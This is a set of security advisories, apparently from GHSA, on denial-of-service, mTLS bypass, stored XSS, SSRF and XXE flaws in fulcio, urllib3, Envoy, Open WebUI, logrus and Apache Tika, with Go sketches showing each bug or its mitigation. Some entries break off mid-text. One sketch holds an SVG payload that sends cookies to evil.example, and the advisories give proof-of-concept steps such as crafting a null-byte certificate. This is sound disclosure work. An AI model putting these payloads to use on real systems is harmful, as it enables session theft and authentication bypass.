Source: GHSA
Function [identity.extractIssuerURL](https://github.com/sigstore/fulcio/blob/main/pkg/identity/issuerpool.go#L44-L45) currently splits its argument, which is untrusted data, on periods via a call to [strings.Split](https://pkg.go.dev/strings#Split). As a result, given a malicious request whose payload contains an (invalid) OIDC identity token with many period characters, a call to `extractIssuerURL` incurs O(n) bytes of allocations (where n is the length of the function's argument), with a constant factor of about 16.

Relevant weakness: [CWE-405: Asymmetric Resource Consumption (Amplification)](https://cwe.mitre.org/data/definitions/405.html)

### Details

See [identity.extractIssuerURL](https://github.com/sigstore/fulcio/blob/main/pkg/identity/issuerpool.go#L44-L45)

### Impact

Excessive memory allocation
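A minimal Go sketch of the amplification class (not fulcio's code; the input size is illustrative): `strings.Split` returns one string header per separator, so an input that is almost all periods drives roughly 16 bytes of slice allocation per input byte on 64-bit platforms.

```go
package main

import (
	"fmt"
	"strings"
	"unsafe"
)

func main() {
	// An attacker-controlled value consisting almost entirely of periods,
	// standing in for the token field that gets split.
	input := strings.Repeat(".", 1<<20) // 1 MiB of input

	parts := strings.Split(input, ".")

	// Each element of the returned slice is a string header
	// (pointer + length, 16 bytes on 64-bit platforms), so the slice
	// alone costs ~16x the input size before counting anything else.
	fmt.Printf("input: %d bytes, slice headers: ~%d bytes\n",
		len(input), len(parts)*int(unsafe.Sizeof("")))
}
```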
### Impact

urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.

The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requ...
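urllib3 itself is Python; the following Go sketch illustrates the general defense against this class of issue, not urllib3's implementation: cap how many decompressed bytes you accept from a stream, regardless of the compression ratio.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"fmt"
	"io"
	"strings"
)

// maxDecoded caps how much decompressed data we are willing to buffer
// for a single read; the 1 MiB value is an illustrative choice.
const maxDecoded = 1 << 20

func readBounded(compressed io.Reader) ([]byte, error) {
	zr, err := gzip.NewReader(compressed)
	if err != nil {
		return nil, err
	}
	defer zr.Close()

	// LimitReader stops after maxDecoded+1 bytes; seeing the extra
	// byte tells us the payload exceeded the cap.
	data, err := io.ReadAll(io.LimitReader(zr, maxDecoded+1))
	if err != nil {
		return nil, err
	}
	if len(data) > maxDecoded {
		return nil, fmt.Errorf("decompressed payload exceeds %d bytes", maxDecoded)
	}
	return data, nil
}

func main() {
	// A highly compressible payload: 8 MiB of zeros gzips down to a
	// few KiB, the shape of payload the advisory describes.
	var buf bytes.Buffer
	zw := gzip.NewWriter(&buf)
	io.Copy(zw, strings.NewReader(strings.Repeat("\x00", 8<<20)))
	zw.Close()

	fmt.Printf("compressed size: %d bytes\n", buf.Len())
	if _, err := readBounded(&buf); err != nil {
		fmt.Println("rejected:", err)
	}
}
```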
## Impact

urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`). However, the number of links in the decompression chain was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps, leading to high CPU usage and massive memory allocation for the decompressed data.

## Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources, unless they disable content decoding explicitly.

## Remediation

Upgrade to at least urllib3 v2.6.0, in which the library limits the number of links to 5. If upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers["content-encoding"]` contains a safe number of encodings before reading the response content.
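A minimal Go sketch of the same guard (urllib3 is Python; only the limit of 5 comes from the advisory, the rest is illustrative): parse the `Content-Encoding` header and refuse responses whose decompression chain exceeds a fixed bound before decoding anything.

```go
package main

import (
	"fmt"
	"strings"
)

// maxEncodingLinks mirrors the bound urllib3 v2.6.0 applies per the
// advisory; everything else here is an illustrative sketch.
const maxEncodingLinks = 5

func safeEncodingChain(contentEncoding string) ([]string, error) {
	if contentEncoding == "" {
		return nil, nil
	}
	var chain []string
	for _, enc := range strings.Split(contentEncoding, ",") {
		chain = append(chain, strings.ToLower(strings.TrimSpace(enc)))
	}
	if len(chain) > maxEncodingLinks {
		return nil, fmt.Errorf("refusing %d chained encodings (limit %d)",
			len(chain), maxEncodingLinks)
	}
	return chain, nil
}

func main() {
	// A malicious server can stack encodings arbitrarily deep.
	malicious := strings.Repeat("gzip, ", 99) + "zstd"
	if _, err := safeEncodingChain(malicious); err != nil {
		fmt.Println("rejected:", err)
	}

	ok, _ := safeEncodingChain("gzip, zstd")
	fmt.Println("accepted chain:", ok)
}
```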
### Summary

Envoy's mTLS certificate matcher for `match_typed_subject_alt_names` may incorrectly treat certificates containing an embedded null byte (`\0`) inside an `OTHERNAME` SAN value as valid matches.

### Details

This occurs when the SAN is encoded as a `BMPSTRING` or `UNIVERSALSTRING`, and its UTF-8 conversion result is truncated at the first null byte during string assignment. As a result, `"victim\0evil"` may match an `exact: "victim"` rule and be accepted by Envoy.

### PoC

1. Create a CA and a server certificate signed by that CA.
2. Create two client certificates signed by the same CA:
   * `client_evil` with `OTHERNAME` `BMPSTRING` = `"evil"`
   * `client_null` with `OTHERNAME` `BMPSTRING` = `"victim\0evil"`
3. Configure Envoy with `require_client_certificate: true` and a `match_typed_subject_alt_names` entry for the `OTHERNAME` OID with `matcher.exact: "victim"`.
4. Connect without a client cert → connection rejected.
5. Connect with `client_evil` → connection rejected.
6. Connect with `client_null` → connection accepted (but s...
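Envoy's matcher is C++; the following Go sketch only models the bug class: when a length-delimited string is truncated at the first NUL before an exact-match comparison, `"victim\x00evil"` collapses to `"victim"`.

```go
package main

import (
	"fmt"
	"strings"
)

// truncateAtNUL models a C-style string assignment, which stops at the
// first NUL byte even though the DER-decoded SAN carries an explicit
// length.
func truncateAtNUL(s string) string {
	if i := strings.IndexByte(s, 0); i >= 0 {
		return s[:i]
	}
	return s
}

func main() {
	san := "victim\x00evil" // attacker-controlled OTHERNAME value
	rule := "victim"        // the matcher.exact rule from the config

	// Correct: compare the full, length-delimited value.
	fmt.Println("length-aware match:", san == rule) // false

	// Buggy: truncation at NUL makes the values appear equal.
	fmt.Println("NUL-truncated match:", truncateAtNUL(san) == rule) // true
}
```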
## Summary

Forwarding of early CONNECT data in TCP proxy mode.

## Details

Per [RFC 7231 §4.3.6](https://www.rfc-editor.org/rfc/rfc7231#section-4.3.6), the sender of CONNECT (and all inbound proxies) switches to tunnel mode only after receiving a 2xx response. However, in TCP proxy mode, Envoy accepts client data before it has issued a 2xx response and eagerly proxies it to an established TCP connection. This creates the possibility of a de-synchronized tunnel state if a proxy upstream from Envoy responds with a status other than 2xx. The RFC does not specify the behavior when early CONNECT data is received, and sending early CONNECT data is common as a latency reduction mechanism.

To prevent disruption to existing deployments, Envoy will by default allow early CONNECT data. Setting the `envoy.reloadable_features.reject_early_connect_data` runtime flag to `true` will cause CONNECT requests that send data before the 2xx response to be rejected. This option should be enabled if there are intermediaries ...
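A minimal Go sketch of what "early CONNECT data" looks like on the wire (a hypothetical client against a hypothetical proxy address, not Envoy code): the client writes tunneled bytes immediately after the CONNECT request instead of waiting for the 2xx.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
)

func main() {
	// Hypothetical address; assumes a CONNECT-capable proxy listens there.
	conn, err := net.Dial("tcp", "proxy.example.com:3128")
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Send the CONNECT request and, in the same write, the first bytes
	// of the tunneled stream, before any 2xx arrives. This is the
	// latency optimization the advisory describes; it desynchronizes
	// the tunnel if the proxy answers with a non-2xx status.
	fmt.Fprint(conn, "CONNECT upstream.example.com:443 HTTP/1.1\r\n"+
		"Host: upstream.example.com:443\r\n\r\n"+
		"early tunneled bytes")

	// Per the RFC, the client should have waited for this status line
	// before sending any tunnel data.
	status, _ := bufio.NewReader(conn).ReadString('\n')
	fmt.Print("proxy answered: ", status)
}
```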
### Summary

Envoy crashes when JWT authentication is configured with remote JWKS fetching, `allow_missing_or_failed` is enabled, multiple JWT tokens are present in the request headers, and the JWKS fetch fails.

### Details

This is caused by a re-entry bug in `JwksFetcherImpl`. When the first token's JWKS fetch fails, the `onJwksError()` callback triggers processing of the second token, which calls `fetch()` again on the same fetcher object. The original callback's `reset()` then clears the second fetch's state (`receiver_` and `request_`), which causes a crash when the async HTTP response arrives (see the sketch after this advisory).

### PoC

* `allow_missing_or_failed` or `allow_missing` is enabled
* The client sends 2 `Authorization` headers
* The remote JWKS fetch fails
* Envoy crashes

### Impact

DoS and crash

### Mitigation

* Disable `allow_missing_or_failed` or `allow_missing`
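Envoy is C++; the following Go sketch models only the re-entry pattern described above (all names are illustrative): the error callback for fetch #1 starts fetch #2 on the same object, and the cleanup that runs after the callback returns wipes the state fetch #2 just installed.

```go
package main

import "fmt"

// fetcher models a fetch object that keeps per-request state in shared
// fields, the shape the advisory describes for JwksFetcherImpl.
type fetcher struct {
	receiver func(string)
}

// fetch installs the receiver for the next async response. When the
// fetch fails synchronously, it fires onError and then resets state.
func (f *fetcher) fetch(failNow bool, onError func(), onDone func(string)) {
	f.receiver = onDone
	if failNow {
		onError() // token #2 may re-enter fetch() from inside this callback
		// Cleanup for fetch #1 runs after the callback returns and
		// clobbers the state fetch #2 just installed.
		f.receiver = nil
	}
}

// deliver is the async HTTP response arriving for fetch #2.
func (f *fetcher) deliver(payload string) {
	f.receiver(payload) // receiver is nil: the Go analogue of the crash
}

func main() {
	f := &fetcher{}

	// The fetch for token #1 fails; its error callback processes
	// token #2 by calling fetch() again on the same object.
	f.fetch(true, func() {
		f.fetch(false, nil, func(s string) { fmt.Println("got:", s) })
	}, nil)

	defer func() {
		if r := recover(); r != nil {
			fmt.Println("crash:", r)
		}
	}()
	f.deliver("jwks response")
}
```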
## Summary

A **Stored XSS vulnerability** has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to **execute arbitrary JavaScript code** and **steal session tokens** when a victim downloads the note as PDF. This vulnerability can be exploited by **any authenticated user**, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.

## Details

### Vulnerability Location

**File:** `src/lib/components/notes/utils.ts`
**Function:** `downloadPdf()`

**Vulnerable Code (Line 35):**

```typescript
const contentNode = document.createElement('div');
contentNode.innerHTML = html; // Direct assignment without DOMPurify sanitization
node.appendChild(contentNode);
document.body.appendChild(node);
```

### Root Cause

1. **Incomplete TipTap Editor Configuration** - Open-WebUI only uses ...
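The comment in the vulnerable code points at the missing step: sanitizing `html` before the `innerHTML` assignment. Open-WebUI's frontend is TypeScript; as a language-neutral illustration of the same idea, here is a minimal Go sketch using the bluemonday sanitizer (an assumption for illustration, not Open-WebUI's fix), which strips the SVG and event-handler vectors the advisory describes.

```go
package main

import (
	"fmt"

	"github.com/microcosm-cc/bluemonday"
)

func main() {
	// The payload shape from the advisory: an SVG smuggling script
	// into otherwise benign note content.
	dirty := `<p>notes</p><svg onload="fetch('https://evil.example/?c='+document.cookie)"><script>alert(1)</script></svg>`

	// UGCPolicy allows common formatting tags but strips svg, script,
	// and event-handler attributes before the HTML is rendered.
	p := bluemonday.UGCPolicy()
	fmt.Println(p.Sanitize(dirty)) // prints only: <p>notes</p>
}
```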
### Summary

A Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required.

### Details

The vulnerability exists in the `/api/v1/retrieval/process/web` endpoint located in `backend/open_webui/routers/retrieval.py` at lines 1758-1767.

Vulnerable code:

```python
@router.post("/process/web")
def process_web(
    request: Request, form_data: ProcessUrlForm, user=Depends(get_verified_user)
):
    try:
        collection_name = form_data.collection_name
        if not collection_name:
            collection_name = calculate_sha256_string(form_data.url)[:63]

        content, docs = get_content_from_url(request, form_data.url)  # ← SSRF vulnerability
```

Th...
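A general mitigation sketch in Go (not Open WebUI's Python code): resolve the requested host and refuse loopback, private, and link-local addresses, which covers the metadata endpoints and internal services listed above, before issuing any request.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// validateTarget resolves the URL's host and rejects the addresses an
// SSRF payload typically targets: loopback, RFC 1918 ranges, and
// link-local (which includes the 169.254.169.254 metadata endpoint).
func validateTarget(raw string) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	ips, err := net.LookupIP(u.Hostname())
	if err != nil {
		return err
	}
	for _, ip := range ips {
		if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified() {
			return fmt.Errorf("refusing internal address %s", ip)
		}
	}
	return nil
}

func main() {
	for _, target := range []string{
		"http://169.254.169.254/latest/meta-data/", // cloud metadata
		"http://localhost:8080/admin",              // internal service
	} {
		fmt.Println(target, "->", validateTarget(target))
	}
}
```

Note that a check like this is only complete if the request is then pinned to the validated IP at dial time; re-resolving the hostname when fetching reopens the hole via DNS rebinding.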
A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with "token too long" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged.
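A minimal repro sketch, assuming a vulnerable logrus version (< 1.8.3); `Writer()` and `bufio.MaxScanTokenSize` are the real APIs, the observed errors are as the advisory describes:

```go
package main

import (
	"bytes"
	"fmt"

	"github.com/sirupsen/logrus"
)

func main() {
	logger := logrus.New()

	// Writer() returns an *io.PipeWriter; an internal goroutine reads
	// the other end of the pipe with a bufio.Scanner.
	w := logger.Writer()
	defer w.Close()

	// A single line larger than bufio.MaxScanTokenSize (64 KiB) with
	// no newline. On vulnerable versions the scanner fails with
	// "token too long" and the pipe is closed.
	payload := bytes.Repeat([]byte("A"), 70*1024)
	if _, err := w.Write(payload); err != nil {
		fmt.Println("oversized write failed:", err)
	}

	// On vulnerable versions this write now fails because the pipe is
	// closed, leaving the writer permanently unusable; fixed versions
	// chunk the oversized input and keep the pipe open.
	if _, err := w.Write([]byte("hello\n")); err != nil {
		fmt.Println("writer is dead:", err)
	}
}
```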
Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside a PDF. This CVE covers the same vulnerability as CVE-2025-54988; however, it expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core, so users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.